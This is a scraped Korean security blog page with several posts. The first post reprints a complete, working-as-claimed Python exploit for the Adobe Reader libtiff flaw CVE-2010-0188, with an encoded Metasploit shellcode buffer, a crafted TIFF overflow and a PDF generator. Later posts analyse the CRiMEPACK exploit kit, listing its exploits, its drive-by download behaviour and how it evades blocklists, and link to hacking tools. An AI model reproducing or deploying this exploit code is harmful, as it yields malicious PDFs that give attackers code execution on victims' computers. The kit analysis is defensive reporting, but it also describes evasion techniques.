adobe 최근 취약점

그외 해킹기술
posted by 블르샤이닝 2010. 7. 22. 09:34
728x90

PDF/CVE-2010-0188



Copyright villys777 All
http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html
Exploits works with Adobe js disabled.

import sys
import base64
import struct
import zlib
import StringIO

SHELLCODE_OFFSET=1500
TIFF_OFSET=0x2038

# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
buf = "\x2b\xc9\xd9\xc0\xd9\x74\x24\xf4\x5e\xb1\x33\xba\xd9\xb4"
buf += "\x0a\xbe\x31\x56\x15\x03\x56\x15\x83\x1f\xb0\xe8\x4b\x63"
buf += "\x51\x65\xb3\x9b\xa2\x16\x3d\x7e\x93\x04\x59\x0b\x86\x98"
buf += "\x29\x59\x2b\x52\x7f\x49\xb8\x16\xa8\x7e\x09\x9c\x8e\xb1"
buf += "\x8a\x10\x0f\x1d\x48\x32\xf3\x5f\x9d\x94\xca\x90\xd0\xd5"
buf += "\x0b\xcc\x1b\x87\xc4\x9b\x8e\x38\x60\xd9\x12\x38\xa6\x56"
buf += "\x2a\x42\xc3\xa8\xdf\xf8\xca\xf8\x70\x76\x84\xe0\xfb\xd0"
buf += "\x35\x11\x2f\x03\x09\x58\x44\xf0\xf9\x5b\x8c\xc8\x02\x6a"
buf += "\xf0\x87\x3c\x43\xfd\xd6\x79\x63\x1e\xad\x71\x90\xa3\xb6"
buf += "\x41\xeb\x7f\x32\x54\x4b\x0b\xe4\xbc\x6a\xd8\x73\x36\x60"
buf += "\x95\xf0\x10\x64\x28\xd4\x2a\x90\xa1\xdb\xfc\x11\xf1\xff"
buf += "\xd8\x7a\xa1\x9e\x79\x26\x04\x9e\x9a\x8e\xf9\x3a\xd0\x3c"
buf += "\xed\x3d\xbb\x2a\xf0\xcc\xc1\x13\xf2\xce\xc9\x33\x9b\xff"
buf += "\x42\xdc\xdc\xff\x80\x99\x13\x4a\x88\x8b\xbb\x13\x58\x8e"
buf += "\xa1\xa3\xb6\xcc\xdf\x27\x33\xac\x1b\x37\x36\xa9\x60\xff"
buf += "\xaa\xc3\xf9\x6a\xcd\x70\xf9\xbe\xae\x17\x69\x22\x1f\xb2"
buf += "\x09\xc1\x5f\x00"

class CVE20100188Exploit:
def __init__(self,shellcode):
self.shellcode = shellcode
self.tiff64=base64.b64encode(self.gen_tiff())

def gen_tiff(self):
tiff = '\x49\x49\x2a\x00'
tiff += struct.pack("<L", TIFF_OFSET)

tiff += '\x90' * (SHELLCODE_OFFSET)
tiff += self.shellcode
tiff += '\x90' * (TIFF_OFSET - 8 - len(buf) - SHELLCODE_OFFSET)

tiff += "\x07\x00\x00\x01\x03\x00\x01\x00"
tiff += "\x00\x00\x30\x20\x00\x00\x01\x01\x03\x00\x01\x00\x00\x00\x01\x00"
tiff += "\x00\x00\x03\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x01"
tiff += "\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01\x04\x00\x01\x00"
tiff += "\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00\x01\x00\x00\x00\x30\x20"
tiff += "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00"
tiff += "\x00\x00\x00\x0C\x0C\x08\x24\x01\x01\x00\xF7\x72\x00\x07\x04\x01"
tiff += "\x01\x00\xBB\x15\x00\x07\x00\x10\x00\x00\x4D\x15\x00\x07\xBB\x15"
tiff += "\x00\x07\x00\x03\xFE\x7F\xB2\x7F\x00\x07\xBB\x15\x00\x07\x11\x00"
tiff += "\x01\x00\xAC\xA8\x00\x07\xBB\x15\x00\x07\x00\x01\x01\x00\xAC\xA8"
tiff += "\x00\x07\xF7\x72\x00\x07\x11\x00\x01\x00\xE2\x52\x00\x07\x54\x5C"
tiff += "\x00\x07\xFF\xFF\xFF\xFF\x00\x01\x01\x00\x00\x00\x00\x00\x04\x01"
tiff += "\x01\x00\x00\x10\x00\x00\x40\x00\x00\x00\x31\xD7\x00\x07\xBB\x15"
tiff += "\x00\x07\x5A\x52\x6A\x02\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\x58\xCD\x2E\x3C\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\x05\x5A\x74\xF4\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\xB8\x49\x49\x2A\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\x00\x8B\xFA\xAF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\x75\xEA\x87\xFE\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\xEB\x0A\x5F\xB9\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\xE0\x03\x00\x00\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\xF3\xA5\xEB\x09\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\xE8\xF1\xFF\xFF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\xFF\x90\x90\x90\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
tiff += "\x00\x07\xFF\xFF\xFF\x90\x4D\x15\x00\x07\x31\xD7\x00\x07\x2F\x11"
tiff += "\x00\x07"
return tiff


def gen_xml(self):
xml= '''<?xml version="1.0" encoding="UTF-8" ?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/">
<present>
<pdf>
<version>1.65</version>
<interactive>1</interactive>
<linearized>1</linearized>
</pdf>
<xdp>
<packets>*</packets>
</xdp>
<destination>pdf</destination>
</present>
</config>
<template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/">
<subform name="topmostSubform" layout="tb" locale="en_US">
<pageSet>
<pageArea id="PageArea1" name="PageArea1">
<contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" />
<medium short="612pt" long="792pt" stock="custom" />
</pageArea>
</pageSet>
<subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt">
<break before="pageArea" beforeTarget="#PageArea1" />
<bind match="none" />
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
<ui>
<imageEdit />
</ui>
</field>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner FormTargetVersion 24?>
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
<?templateDesigner Zoom 94?>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<topmostSubform>
<ImageField1 xfa:contentType="image/tif" href="">'''+self.tiff64 +'''</ImageField1>
</topmostSubform>
</xfa:data>
</xfa:datasets>
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" />
<form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/">
<subform name="topmostSubform">
<instanceManager name="_Page1" />
<subform name="Page1">
<field name="ImageField1" />
</subform>
<pageSet>
<pageArea name="PageArea1" />
</pageSet>
</subform>
</form>
</xdp:xdp>

'''
return xml

def gen_pdf(self):
xml = zlib.compress(self.gen_xml())
pdf='''%PDF-1.6
1 0 obj
<</Filter /FlateDecode/Length ''' + str(len(xml)) + '''/Type /EmbeddedFile>>
stream
''' + xml+'''
endstream
endobj
2 0 obj
<</V () /Kids [3 0 R] /T (topmostSubform[0]) >>
endobj
3 0 obj
<</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>>
endobj
4 0 obj
<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>>
endobj
5 0 obj
<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>>
endobj
6 0 obj
<</Kids [5 0 R]/Type /Pages/Count 1>>
endobj
7 0 obj
<</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>>
endobj
8 0 obj
<</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>>
endobj xref
trailer
<</Root 7 0 R/Size 9>>
startxref
14765
%%EOF'''
return pdf


if __name__=="__main__":
if len(sys.argv) != 2:
print "Usage: %s [output.pdf]" % sys.argv[0]

print "Creating Exploit to %s\n"% sys.argv[1]
exploit=CVE20100188Exploit(buf)
f = open(sys.argv[1],mode='wb')
f.write(exploit.gen_pdf())
f.close()
print "[+] done !"
728x90

'그외 해킹기술' 카테고리의 다른 글

Inside an APT Covert Communications Channel(번역하려고했지만...역시 귀찮군;;;)대충 해석됩니다. ㅎㅎㅎ  (0) 2011.08.17
pdf 파일 분석 툴  (0) 2010.07.26
2007 kisa 취약점 분석 문서  (0) 2010.07.22
CVE-2006-3459  (0) 2010.07.22
State of the art in CRiMEPACK Exploit Pack  (0) 2010.07.22

State of the art in CRiMEPACK Exploit Pack

그외 해킹기술
posted by 블르샤이닝 2010. 7. 22. 09:32
728x90

CRiMEPACK exploit pack is a widespread and accepted in the crime scene in this area came under the slogan “Highest Lowest rates for the price“.

He is currently In-the-Wild 3.0 version is being developed as alpha (the first of this version). That’s, is in the middle stage of evaluation, perhaps in the next few days will go on sale in underground forums, at which time it will know your actual cost.

Like any pack exploit, it also consists of a set of pre-compiled exploits to take advantage of a number of vulnerabilities in systems with weaknesses in some of its applications, then download and run (Drive-by-Download & Execute) codes malicious and convert that system into a zombie, and therefore part of the apparatus crime.

And I mean … “criminal” because those behind the development of this type of crimeware do for this purpose. And judging by the pictures (a washcloth, a handgun, a wallet, money and what appears to be cocaine, own scenario of all mafia) observed in the authentication interface your control panel, this definition is very evident.

The first time I found this package was in 2009, when version In-the-Wild was version 2.1 and later expressed his “great leap” to one of the most popular: version 2.8 (still active) which in early 2010 had incorporated into its portfolio of exploits CVE-2010-0188 y CVE-2010-0806; in addition to adding an iframe generator and function “Kaspersky Anti-emulation“, at a cost of USD 400.

In this first stage of the evaluation version 3, CRiMEPACK incorporates a total of 14 exploits, which are:

  • name=”mdac”

    • desc=”IE6 COM CreateObject Code Execution” CVE-2006-0003

  • name=”msiemc”

    • desc=”IE7 Uninitialized Memory Corruption” CVE-2010-0806

  • name=”java”

    • desc=”JRE getSoundBank Stack BOF” CVE-2009-3867

  • name=”iepeers”

    • desc=”IEPeers Remote Code Execution” CVE-2010-0806

  • name=”pdfexpl”

    • desc=”PDF Exploits [collectEmailInfo (CVE-2007-5659), getIcon (CVE-2009-0927), util.printf (CVE-2008-2992)]”

  • name=”opera”

    • desc=”Opera TN3270″ CVE-2009-3269

  • name=”aol”

    • desc=”AOL Radio AmpX Buffer Overflow” CVE-2007-5755

  • name=”iexml”

    • desc=”Internet Explorer 7 XML Exploit” CVE-2008-4844

  • name=”firefoxdiffer”

    • desc=”Firefox 3.5/1.4/1.5 exploits” CVE-2009-355

  • name=”libtiff”

    • desc=”Adobe Acrobat LibTIFF Integer Overflow” CVE-2010-0188

  • name=”spreadsheet”

    • desc=”OWC Spreadsheet Memory Corruption” CVE-2009-1136

  • name=”activexbundle”

    • desc=”Bundle of ActiveX exploits” CVE-2008-2463

For all the exploits incorporates a feature that can be enabled or disabled from the control panel called “Aggressive Mode“, which is a JAVA Applet that emerge through a pop-up window asking the victim whether to accept potential the applet. If so, reload the payload (the malware).

Furthermore, within the constantly evolving experience this type of crimeware, incorporates self-defensive measures such as avoiding desofuscación scripts and techniques anti Wepawet and Jsunpack.

In addition to automatically check if the domain used is listed in the services:

  • Norton SafeWeb
  • My WebOfTrust
  • Malc0de
  • Google Safe Browsing
  • MDL
  • McAfee SiteAdvisor
  • HpHosts
  • MalwareURL

Brian Kreb few days ago on his blog an article about the implication that this package was in the process of propagation and exploitation of a vulnerability, so far, the type 0-Day through JAVA, and certainly was exploited vulnerability through a class.

However, it was also associated with another exploit pack called SEO Sploit Pack and although it is not the same once more evidence is in complete business processes representing crimeware has a very high demand, offering low-applications costs within a competitive business model … and increasingly aggressive!

Related information
State of the art in Eleonore Exploit Pack
Siberia Exploit Pack. Another package of explois I…
RussKill. Application to perform denial of service…
JustExploit. New Exploit kit that uses vulnerabili…
DDoS Botnet. New crimeware particular purpose
T-IFRAMER. Kit for the injection of malware In-the…
Fragus. New botnet framework In-the-Wild
Liberty Exploit System. Alternatively crimeware to…
TRiAD Botnet III. Remote administration of multi-p…

MalwareIntelligence

---------------------------------------------------------------------------------------------------
reference = http://ef.kaffenews.com/

728x90

'그외 해킹기술' 카테고리의 다른 글

Inside an APT Covert Communications Channel(번역하려고했지만...역시 귀찮군;;;)대충 해석됩니다. ㅎㅎㅎ  (0) 2011.08.17
pdf 파일 분석 툴  (0) 2010.07.26
2007 kisa 취약점 분석 문서  (0) 2010.07.22
CVE-2006-3459  (0) 2010.07.22
adobe 최근 취약점  (0) 2010.07.22

외국 사이트 -해킹 툴

해킹 프로그램
posted by 블르샤이닝 2010. 7. 22. 09:29
728x90

http://www.germaway.com/hack_pack/blogs.htm



m86_web_exploits_report.pdf
728x90

'해킹 프로그램' 카테고리의 다른 글

바이러스 소스코드 모음 사이트  (0) 2022.07.21
SekurLSA module - 윈도우 패스워드 탈취  (0) 2015.03.19
gh0st 소스코드  (0) 2014.01.24
dos 프로그램  (0) 2010.06.14
sql injection 프로그램  (0) 2010.06.10

dos 프로그램

2010. 6. 14. 04:13

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

sql 인젝션 ppt 발표 자료

수업자료
posted by 블르샤이닝 2010. 6. 11. 20:30
728x90
발표문.hwp
SQL Injection.pptx
OWASP_TOP10_2010_RC1_KR[1].pdf

728x90

'수업자료' 카테고리의 다른 글

고대_기말_페도라 로그 wtmp, pacct 로그 기록을 토대로 시각화 만들기  (0) 2019.12.20
고대 넥슨 해킹사례 발표  (0) 2019.12.09
my sql 인젝션  (0) 2010.06.10
넥서스를 이용한 탐지  (0) 2010.05.31
Nessus Server Manager  (0) 2010.05.17

티스토리툴바